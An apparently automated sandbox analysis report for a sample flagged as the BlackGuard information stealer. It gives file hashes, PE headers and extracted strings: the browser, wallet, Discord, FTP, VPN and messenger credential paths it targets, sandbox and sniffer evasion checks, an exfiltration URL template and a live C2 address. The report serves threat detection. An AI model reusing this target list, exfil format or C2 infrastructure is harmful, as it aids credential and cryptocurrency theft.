File name: | gjnvlcxv.exe |
Full analysis: | https://app.any.run/tasks/f2733975-cedb-4d18-a0e1-20ff9b8d653b |
Verdict: | Malicious activity |
Analysis date: | April 01, 2023, 19:22:55 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/x-dosexec |
File info: | PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows |
MD5: | 3ABACDBDDB7190C93D7F24561B201B48 |
SHA1: | 751507B13DA515C2FC06E556EB7D5CA16BC54CD0 |
SHA256: | 72779E29EB9099678AF9B0DAA7E376322A0C8FD2C9ACE68962249ED72930D9D2 |
SSDEEP: | 49152:DX0T+Sk6BU7HIFd7+JJ1glw+W7SCFHT9kly8Pv6Uc:DX0T+Srpzmg2rz38X6Uc |
.exe | | | Generic CIL Executable (.NET, Mono, etc.) (63.1) |
---|---|---|
.exe | | | Win64 Executable (generic) (23.8) |
.dll | | | Win32 Dynamic Link Library (generic) (5.6) |
.exe | | | Win32 Executable (generic) (3.8) |
.exe | | | Generic Win/DOS Executable (1.7) |
AssemblyVersion: | 1.0.0.0 |
---|---|
ProductVersion: | 1.0.0.0 |
ProductName: | - |
OriginalFileName: | fogilcxv.exe |
LegalTrademarks: | gdwhgeral |
LegalCopyright: | - |
InternalName: | fogilcxv.exe |
FileVersion: | 1.0.0.0 |
FileDescription: | tanos |
CompanyName: | - |
Comments: | fdgert opopchie |
CharacterSet: | Unicode |
LanguageCode: | Neutral |
FileSubtype: | - |
ObjectFileType: | Executable application |
FileOS: | Win32 |
FileFlags: | (none) |
FileFlagsMask: | 0x003f |
ProductVersionNumber: | 1.0.0.0 |
FileVersionNumber: | 1.0.0.0 |
Subsystem: | Windows GUI |
SubsystemVersion: | 6 |
ImageVersion: | - |
OSVersion: | 4 |
EntryPoint: | 0x22112e |
UninitializedDataSize: | - |
InitializedDataSize: | 182272 |
CodeSize: | 2224640 |
LinkerVersion: | 48 |
PEType: | PE32 |
ImageFileCharacteristics: | Executable, Large address aware, 32-bit |
TimeStamp: | 2068:11:08 00:30:45+00:00 |
MachineType: | Intel 386 or later, and compatibles |
Architecture: | IMAGE_FILE_MACHINE_I386 |
---|---|
Subsystem: | IMAGE_SUBSYSTEM_WINDOWS_GUI |
Compilation Date: | 08-Nov-2068 00:30:45 |
Comments: | fdgert opopchie |
CompanyName: | - |
FileDescription: | tanos |
FileVersion: | 1.0.0.0 |
InternalName: | fogilcxv.exe |
LegalCopyright: | - |
LegalTrademarks: | gdwhgeral |
OriginalFilename: | fogilcxv.exe |
ProductName: | - |
ProductVersion: | 1.0.0.0 |
Assembly Version: | 1.0.0.0 |
Magic number: | MZ |
---|---|
Bytes on last page of file: | 0x0090 |
Pages in file: | 0x0003 |
Relocations: | 0x0000 |
Size of header: | 0x0004 |
Min extra paragraphs: | 0x0000 |
Max extra paragraphs: | 0xFFFF |
Initial SS value: | 0x0000 |
Initial SP value: | 0x00B8 |
Checksum: | 0x0000 |
Initial IP value: | 0x0000 |
Initial CS value: | 0x0000 |
Overlay number: | 0x0000 |
OEM identifier: | 0x0000 |
OEM information: | 0x0000 |
Address of NE header: | 0x00000080 |
Signature: | PE |
---|---|
Machine: | IMAGE_FILE_MACHINE_I386 |
Number of sections: | 3 |
Time date stamp: | 08-Nov-2068 00:30:45 |
Pointer to Symbol Table: | 0x00000000 |
Number of symbols: | 0 |
Size of Optional Header: | 0x00E0 |
Characteristics: |
|
Name | Virtual Address | Virtual Size | Raw Size | Charateristics | Entropy |
---|---|---|---|---|---|
.text | 0x00002000 | 0x0021F134 | 0x0021F200 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ | 7.95157 |
.rsrc | 0x00222000 | 0x0002C57C | 0x0002C600 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ | 5.34164 |
.reloc | 0x00250000 | 0x0000000C | 0x00000200 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ | 0.10191 |
Title | Entropy | Size | Codepage | Language | Type |
---|---|---|---|---|---|
1 | 5.00112 | 490 | UNKNOWN | UNKNOWN | RT_MANIFEST |
2 | 4.43469 | 67624 | UNKNOWN | UNKNOWN | RT_ICON |
3 | 4.78561 | 38056 | UNKNOWN | UNKNOWN | RT_ICON |
4 | 4.76922 | 21640 | UNKNOWN | UNKNOWN | RT_ICON |
5 | 4.66089 | 16936 | UNKNOWN | UNKNOWN | RT_ICON |
6 | 4.98162 | 9640 | UNKNOWN | UNKNOWN | RT_ICON |
7 | 5.05077 | 4264 | UNKNOWN | UNKNOWN | RT_ICON |
8 | 5.34627 | 2440 | UNKNOWN | UNKNOWN | RT_ICON |
9 | 5.41874 | 1128 | UNKNOWN | UNKNOWN | RT_ICON |
32512 | 3.03466 | 132 | UNKNOWN | UNKNOWN | RT_GROUP_ICON |
mscoree.dll |
PID | CMD | Path | Indicators | Parent process | |||||||||||
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
2824 | "C:\Users\admin\AppData\Local\Temp\gjnvlcxv.exe" | C:\Users\admin\AppData\Local\Temp\gjnvlcxv.exe | explorer.exe | ||||||||||||
User: admin Integrity Level: MEDIUM Description: tanos Exit code: 3762504530 Version: 1.0.0.0 Modules
BlackGuard(PID) Process(2824) gjnvlcxv.exe Strings (590)x64\\SQLite.Interop.dll x86\\SQLite.Interop.dll \\Browsers \\Browsers\\cookie_chrome.txt \\Browsers\\password_chrome.txt \\Browsers\\cookies_Brave.txt \\Browsers\\password_Brave.txt \\Browsers\\cookies_Vivaldi.txt \\Browsers\\password_Vivaldi.txt \\Browsers\\cookies_Opera.txt \\Browsers\\password_Opera.txt \\Browsers\\cookies_Edge.txt \\Browsers\\password_Edge.txt \\Browsers\\cookies_EdgeBeta.txt \\Browsers\\password_EdgeBeta.txt \\Wallets \\Browsers\\password_firefox.txt \\Browsers\\cookies_firefox.txt \\Messenger \\Chrome_Wallet \\Edge_Wallet \\Edge Betta_Wallet \UsAgent.txt Browser : {0} {1} {2} {3} {4} {5} {6} {7} {8} {9} {10} Unspecified Medium Domain: Domain: Login: Password: Password: {0} {1} {2} {3} {4} {5} {6} {7} \\Information.txt Upgrade.php http analyzer stand-alone fiddler effetech http sniffer firesheep IEWatch Professional dumpcap wireshark wireshark portable sysinternals tcpview NetworkMiner NetworkTrafficView HTTPNetworkSniffer tcpdump intercepter Intercepter-NG The Cookie database could not be found: The Key for decryption (Local State) could not be found: The Login database could not be found: \\Roaming\\ \\FTP\\WinSCP WinSCP.ini \\FTP\\WinSCP\\WinSCP.ini Hostname = ' ' | DecryptedUsername = ' ' | DecryptedPassword = ' Title = ' ' | Url = ' \zaredin.jbbt \UGFghfw.helt MM/dd/yyyy h:mm Software\\Microsoft\\Office\\15.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676 Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676 Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676 Software\\Microsoft\\Windows Messaging Subsystem\\Profiles\\9375CFF0413111d3B88A00104B2A6676 SMTP Email Address SMTP Server POP3 Server POP3 User Name SMTP User Name NNTP Email Address NNTP User Name NNTP Server IMAP Server IMAP User Name Email HTTP User HTTP Server URL POP3 User IMAP User HTTPMail User Name HTTPMail Server SMTP User POP3 Password2 IMAP Password2 NNTP Password2 HTTPMail Password2 SMTP Password2 POP3 Password IMAP Password NNTP Password HTTPMail Password SMTP Password \\Outlook.txt UGFzc3dvcmQ= null ^([a-zA-Z0-9_\-\.]+)@([a-zA-Z0-9_\-\.]+)\.([a-zA-Z]{2,5})$ ^(?!:\/\/)([a-zA-Z0-9-_]+\.)*[a-zA-Z0-9][a-zA-Z0-9-_]+\.[a-zA-Z]{2,11}?$ \\Temp\\dotnetbrowser-chromium\\64.0.3282.24.1.19.0.0.642\\32bit \\Chromium\\User Data \\Google\\Chrome\\User Data \\Google(x86)\\Chrome\\User Data \\MapleStudio\\ChromePlus\\User Data \\Iridium\\User Data \\7Star\\User Data \\CentBrowser\\User Data \\Chedot\\User Data \\Vivaldi\\User Data \\Kometa\\User Data \\Elements Browser\\User Data \\Epic Privacy Browser\\User Data \\uCozMedia\\Uran\\User Data \\Fenrir Inc\\Sleipnir5\\setting\\modules\\ChromiumViewer \\CatalinaGroup\\Citrio\\User Data \\Coowon\\Coowon\\User Data \\liebao\\User Data \\QIP Surf\\User Data \\Orbitum\\User Data \\Comodo\\Dragon\\User Data \\Amigo\\User\\User Data \\Torch\\User Data \\Comodo\\User Data \\360Browser\\Browser\\User Data \\Maxthon3\\User Data \\K-Melon\\User Data \\Sputnik\\Sputnik\\User Data \\Nichrome\\User Data \\CocCoc\\Browser\\User Data \\Uran\\User Data \\Chromodo\\User Data UNIQUE .dat Hostname: BCrypt.BCryptDecrypt() (get size) failed with status code: {0} BCrypt.BCryptDecrypt(): authentication tag mismatch BCrypt.BCryptDecrypt() failed with status code:{0} BCrypt.BCryptOpenAlgorithmProvider() failed with status code:{0} BCrypt.BCryptSetAlgorithmProperty(BCrypt.BCRYPT_CHAINING_MODE, BCrypt.BCRYPT_CHAIN_MODE_GCM) failed with status code:{0} BCrypt.BCryptImportKey() failed with status code:{0} BCrypt.BCryptGetProperty() (get size) failed with status code:{0} BCrypt.BCryptGetProperty() failed with status code:{0} ObjectLength ChainingModeGCM AuthTagLength ChainingMode KeyDataBlob Microsoft Primitive Provider ].rar cp866 files/upgrade.php?user={0}&hwid={1}&antivirus={2}&os={3}&passCount={4}&coockieCount={5}&walletCount={6}&telegramCount={7}&vpnCount={8}&ftpCount={9}&country={10}&searche={11}&link={12} POST SystemDrive SELECT * FROM CIM_OperatingSystem Caption Windows 8 Windows 8.1 Windows 10 Windows 11 Windows XP Windows 7 Server Unknown Windows Server SELECT * FROM Win32_OperatingSystem Version BIOS Maker: Unknown \root\SecurityCenter2 SELECT * FROM AntivirusProduct displayName https://ipwhois.app/xml/ country Armenia Azerbaijan Belarus Kazakhstan Kyrgyzstan Moldova Tajikistan Uzbekistan Ukraine Russia .txt .config .rdp Worlds SbieDll.dll cmdvrt32.dll jkvvd SxIn.dll uryu65 l5y546546t3tl 25454 cuckoomon.dll \\Discord \\Tokens.txt .log .ldb [a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}|mfa\.[a-zA-Z0-9_\-]{84} Discord\\Local Storage\\leveldb Discord PTB\\Local Storage\\leveldb Discord Canary\\leveldb \\Files \\source \\FileZilla \\FileZilla.log RecentServers SG9zdA== UG9ydA== Rǫ UGFzcw== link: Port: Uname: pws: FileZilla\recentservers.xml \\GHISLER\\ \\FTP\\Total Commander wcx_ftp.ini \\FTP\\Total Commander\\wcx_ftp.ini Protocol: Login: pSWrd: \\Pidgin_INFo.txt .purple\\accounts.xml \\Steam ssfn* \\config\\config.vdf \\config.vdf \\config\\loginusers.vdf \\loginusers.vdf \\config\\SteamAppData.vdf \\SteamAppData.vdf Software\\Wow6432Node\\Valve\\Steam InstallPath Software\\Valve\\Steam VGVsZWdyYW0= %appdata% \Telegram Desktop\tdata \\Telegram Telegram.exe \tdata \\Telegram\\ NordVPN NordVpn.exe* user.config \\VPN\\NordVPN\\ //setting[@name='Username']/value //setting[@name='Password']/value \\accounts.txt OpenVPN Connect\\profiles \\VPN\\OpenVPN b3Zwbg== ProtonVPN ProtonVPN.exe \\user.config \\VPN\\ProtonVPN U29mdHdhcmU= strDataDir \\wallets Zcash \\Zcash Armory \\Armory SmF4eA== \\com.liberty.jaxx\\IndexedDB\\file__0.indexeddb.leveldb Exodus \\Exodus\\exodus.wallet RXRoZXJldW0= \\Ethereum\\keystore RWxlY3RydW0= \\Electrum\\wallets QXRvbWljV2FsbGV0 \\atomic\\Local Storage\\leveldb Guarda \\Guarda\\Local Storage\\leveldb Zap \\Zap\\Local Storage\\leveldb Binance \\Binance\\Local Storage\\leveldb atomic_qt \\atomic_qt\\config Frame \\Frame\\Local Storage\\leveldb io.solarwallet.app \\io.solarwallet.app\\Local Storage\\leveldb TokenPocket \\TokenPocket\\Local Storage\\leveldb TGl0ZWNvaW4= RGFzaA== *.txt \\Browsers\\search_link.txt SELECT ExecutablePath, ProcessID FROM Win32_Process ProcessID ExecutablePath Software\Microsoft\Windows\Shell\Associations\UrlAssociations\http\UserChoice Progid chromehtml chrome firefoxurl firefox operastable opera yandexhtml browser msedgehtm msedge iexplore http://127.0.0.1:{0} http://127.0.0.1:{0}/ User-Agent https://google.com/ dictionary ERROR SELECT COUNT(*) AS CNTREC FROM pragma_table_info(' ') WHERE name=' The current process is 32-bit! To decrypt firefox values it needs to be 64-bit \mozglue.dll MozGlue was not found: \nss3.dll NSS3 was not found: \mozglue.dll could not be found: \nss3.dll could not be found: NSS_Init PK11SDR_Decrypt NSS_Shutdown Process Address of NSS_Init was not found! Process Address of PK11SDR_Decrypt was not found! Process Address of NSS_Shutdown was not found! Function 'NSS_Init()' was not found! Function 'PK11SDR_Decrypt()' was not found! Function 'NSS_Shutdown()' was not found! Key length not 128/192/256 bits. Should never get here invalid parameter passed to AES init AES engine not initialised input buffer too short output buffer too short cipher required with a block size of /GCM Invalid value for MAC size: invalid parameters passed to GCM IV must be at least 1 byte cannot reuse nonce for GCM encryption Key must be specified in initial init Output buffer too short data too short mac check in GCM failed Attempt to process too many blocks GCM cipher cannot be reused for encryption GCM cipher needs to be initialised keyOff keyLen YXV0b2ZpbGw= Opera \\Opera Stable\\Local State \\Local State "encrypted_key":"(.*?)" Opera Opera Software \\Login Data \\Web Data \\History \\Passwords.txt \\AutoFill.txt \\History.txt \\Downloads.txt downloads dXJscw== logins kardannivall.Properties.Resources upche Gecko profile path was not found: \cookies.sqlite \logins.json \places.sqlite hostname httpRealm formSubmitURL usernameField passwordField encryptedUsername encryptedPassword guid encType timeCreated timeLastUsed timePasswordChanged timesUsed ProgramW6432 \Mozilla Firefox The Login File could not be found: \logins.json Profile could not be set: ConvertDynamicObjectsToLogins logins value The History database could not be found: Data Source= ;pooling=false {0} WHERE {1} = '{2}' SELECT id,url,title,rev_host,visit_count,hidden,typed,frecency,last_visit_date,guid,foreign_count,url_hash,description,preview_image_url,origin_id,site_name FROM moz_places C:\Users\ \AppData\Local\Microsoft\Edge Beta\User Data\Default\Network\Cookies \AppData\Local\Microsoft\Edge Beta\User Data\Local State \AppData\Local\Microsoft\Edge Beta\User Data\Default\Login Data \AppData\Local\BraveSoftware\Brave-Browser\User Data\Default\Network\Cookies \AppData\Local\BraveSoftware\Brave-Browser\User Data\Local State \AppData\Local\BraveSoftware\Brave-Browser\User Data\Default\Login Data \AppData\Local\Google\Chrome\User Data\Default\Network\Cookies \AppData\Local\Google\Chrome\User Data\Local State \AppData\Local\Google\Chrome\User Data\Default\Login Data SELECT creation_utc,top_frame_site_key,host_key,name,value,encrypted_value,path,expires_utc,is_secure,is_httponly,last_access_utc,has_expires,is_persistent,priority,samesite,source_scheme,source_port,is_same_party FROM cookies SELECT origin_url,action_url,username_element,username_value,password_element,password_value,submit_element,signon_realm,date_created,blacklisted_by_user,scheme,password_type,times_used,form_data,display_name,icon_url,federation_url,skip_zero_click,generation_upload_status,possible_username_pairs,id... encrypted_key os_crypt Key needs to be {0} bit! Message required! message \AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies \AppData\Local\Microsoft\Edge\User Data\Local State \AppData\Local\Microsoft\Edge\User Data\Default\Login Data \AppData\Roaming\Mozilla\Firefox\Profiles default-release SELECT id,originAttributes,name,value,host,path,expiry,lastAccessed,creationTime,isSecure,isHttpOnly,inBrowserElement,sameSite,rawSameSite,schemeMap FROM moz_cookies \AppData\Roaming\Opera Software\Opera Stable\Cookies \AppData\Roaming\Opera Software\Opera Stable\Local State \AppData\Roaming\Opera Software\Opera Stable\Login Data \AppData\Roaming\Opera Software\Opera GX Stable\Cookies \AppData\Roaming\Opera Software\Opera GX Stable\Local State \AppData\Roaming\Opera Software\Opera GX Stable\Login Data \AppData\Local\Vivaldi\User Data\Default\Network\Cookies \AppData\Local\Vivaldi\User Data\Local State \AppData\Local\Vivaldi\User Data\Default\Login Data Tox \\tox Element \\Element\\Local Storage\\leveldb Signal \\Signal\\Local Storage\\leveldb Proxifier \\Proxifier4\\Profiles EdgeBETA_Auvitas \Microsoft\Edge Beta\User Data\Default\Local Extension Settings\klfhbdnlcfcaccoakhceodhldjojboga\ EdgeBETA_Math \Microsoft\Edge Beta\User Data\Default\Local Extension Settings\dfeccadlilpndjjohbjdblepmjeahlmm\ EdgeBETA_Metamask \Microsoft\Edge Beta\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm\ EdgeBETA_MTV \Microsoft\Edge Beta\User Data\Default\Local Extension Settings\oooiblbdpdlecigodndinbpfopomaegl\ EdgeBETA_Rabet \Microsoft\Edge Beta\User Data\Default\Local Extension Settings\aanjhgiamnacdfnlfnmgehjikagdbafd\ EdgeBETA_Ronin \Microsoft\Edge Beta\User Data\Default\Local Extension Settings\bblmcdckkhkhfhhpfcchlpalebmonecp\ EdgeBETA_Yoroi \Microsoft\Edge Beta\User Data\Default\Local Extension Settings\akoiaibnepcedcplijmiamnaigbepmcb\ EdgeBETA_Zilpay \Microsoft\Edge Beta\User Data\Default\Local Extension Settings\fbekallmnjoeggkefjkbebpineneilec\ EdgeBETA_Exodus \Microsoft\Edge Beta\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold\ EdgeBETA_Terra_Station \Microsoft\Edge Beta\User Data\Default\Local Extension Settings\ajkhoeiiokighlmdnlakpjfoobnjinie\ EdgeBETA_Jaxx Edge_Auvitas \Microsoft\Edge\User Data\Default\Local Extension Settings\klfhbdnlcfcaccoakhceodhldjojboga\ Edge_Math \Microsoft\Edge\User Data\Default\Local Extension Settings\dfeccadlilpndjjohbjdblepmjeahlmm\ Edge_Metamask \Microsoft\Edge\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm\ Edge_MTV \Microsoft\Edge\User Data\Default\Local Extension Settings\oooiblbdpdlecigodndinbpfopomaegl\ Edge_Rabet \Microsoft\Edge\User Data\Default\Local Extension Settings\aanjhgiamnacdfnlfnmgehjikagdbafd\ Edge_Ronin \Microsoft\Edge\User Data\Default\Local Extension Settings\bblmcdckkhkhfhhpfcchlpalebmonecp\ Edge_Yoroi \Microsoft\Edge\User Data\Default\Local Extension Settings\akoiaibnepcedcplijmiamnaigbepmcb\ Edge_Zilpay \Microsoft\Edge\User Data\Default\Local Extension Settings\fbekallmnjoeggkefjkbebpineneilec\ Edge_Exodus \Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold\ Edge_Terra_Station \Microsoft\Edge\User Data\Default\Local Extension Settings\ajkhoeiiokighlmdnlakpjfoobnjinie\ Edge_Jaxx \Microsoft\Edge\User Data\Default\Local Extension Settings\dmdimapfghaakeibppbfeokhgoikeoci\ Chrome_Binance \Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp\ Chrome_Bitapp \Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi\ Chrome_Coin98 \Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg\ Chrome_Equal \Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn\ Chrome_Guild \Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj\ Chrome_Iconex \Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfel\ Chrome_Math \Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc\ Chrome_Mobox \Google\Chrome\User Data\Default\Local Extension Settings\fcckkdbjnoikooededlapcalpionmalo\ Chrome_Phantom \Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa\ Chrome_Tron \Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec\ Chrome_XinPay \Google\Chrome\User Data\Default\Local Extension Settings\bocpokimicclpaiekenaeelehdjllofo\ Chrome_Ton \Google\Chrome\User Data\Default\Local Extension Settings\nphplpgoakhhjchkkhmiggakijnkhfnd\ Chrome_Metamask Chrome_Sollet \Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno\ Chrome_Slope \Google\Chrome\User Data\Default\Local Extension Settings\pocmplpaccanhmnllbbkpgfliimjljgo\ Chrome_Starcoin \Google\Chrome\User Data\Default\Local Extension Settings\mfhbebgoclkghebffdldpobeajmbecfk\ Chrome_Swash \Google\Chrome\User Data\Default\Local Extension Settings\cmndjbecilbocjfkibfbifhngkdmjgog\ Chrome_Finnie \Google\Chrome\User Data\Default\Local Extension Settings\cjmkndjhnagcfbpiemnkdpomccnjblmj\ Chrome_Keplr \Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap\ Chrome_Crocobit \Google\Chrome\User Data\Default\Local Extension Settings\pnlfjmlcjdjgkddecgincndfgegkecke\ Chrome_Oxygen \Google\Chrome\User Data\Default\Local Extension Settings\fhilaheimglignddkjgofkcbgekhenbh\ Chrome_Nifty \Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid\ Chrome_Liquality \Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn\ .compressed bouncycastle.crypto costura.bouncycastle.crypto.dll.compressed costura costura.costura.dll.compressed costura.costura.pdb.compressed dotnetzip costura.dotnetzip.dll.compressed microsoft.win32.primitives costura.microsoft.win32.primitives.dll.compressed newtonsoft.json costura.newtonsoft.json.dll.compressed system.appcontext costura.system.appcontext.dll.compressed system.console costura.system.console.dll.compressed system.data.sqlite costura.system.data.sqlite.dll.compressed system.diagnostics.diagnosticsource costura.system.diagnostics.diagnosticsource.dll.compressed system.diagnostics.tracing costura.system.diagnostics.tracing.dll.compressed system.globalization.calendars costura.system.globalization.calendars.dll.compressed system.io.compression costura.system.io.compression.dll.compressed system.io.compression.zipfile costura.system.io.compression.zipfile.dll.compressed system.io costura.system.io.dll.compressed system.io.filesystem costura.system.io.filesystem.dll.compressed system.io.filesystem.primitives costura.system.io.filesystem.primitives.dll.compressed system.net.http costura.system.net.http.dll.compressed system.net.sockets costura.system.net.sockets.dll.compressed system.reflection costura.system.reflection.dll.compressed system.runtime costura.system.runtime.dll.compressed system.runtime.extensions costura.system.runtime.extensions.dll.compressed system.runtime.interopservices costura.system.runtime.interopservices.dll.compressed system.runtime.interopservices.runtimeinformation costura.system.runtime.interopservices.runtimeinformation.dll.compressed system.security.cryptography.algorithms costura.system.security.cryptography.algorithms.dll.compressed system.security.cryptography.encoding costura.system.security.cryptography.encoding.dll.compressed system.security.cryptography.primitives costura.system.security.cryptography.primitives.dll.compressed system.security.cryptography.x509certificates costura.system.security.cryptography.x509certificates.dll.compressed system.xml.readerwriter costura.system.xml.readerwriter.dll.compressed C2 (1)http://45.67.230.199 | |||||||||||||||
3864 | "C:\Windows\system32\verclsid.exe" /S /C {0B2C9183-C9FA-4C53-AE21-C900B0C39965} /I {0C733A8A-2A1C-11CE-ADE5-00AA0044773D} /X 0x401 | C:\Windows\System32\verclsid.exe | — | explorer.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Extension CLSID Verification Host Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
|
(PID) Process: | (2824) gjnvlcxv.exe | Key: | HKEY_CLASSES_ROOT\Local Settings\MuiCache\16D\52C64B7E |
Operation: | write | Name: | LanguageList |
Value: en-US |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
2824 | gjnvlcxv.exe | GET | — | 45.67.230.199:80 | http://45.67.230.199/Upgrade.php | unknown | — | — | suspicious |
2824 | gjnvlcxv.exe | GET | — | 45.67.230.199:80 | http://45.67.230.199/Upgrade.php | unknown | — | — | suspicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2824 | gjnvlcxv.exe | 45.67.230.199:80 | — | Webhost LLC | RU | suspicious |
2824 | gjnvlcxv.exe | 195.201.57.90:443 | ipwhois.app | Hetzner Online GmbH | DE | suspicious |
Domain | IP | Reputation |
---|---|---|
ipwhois.app |
| suspicious |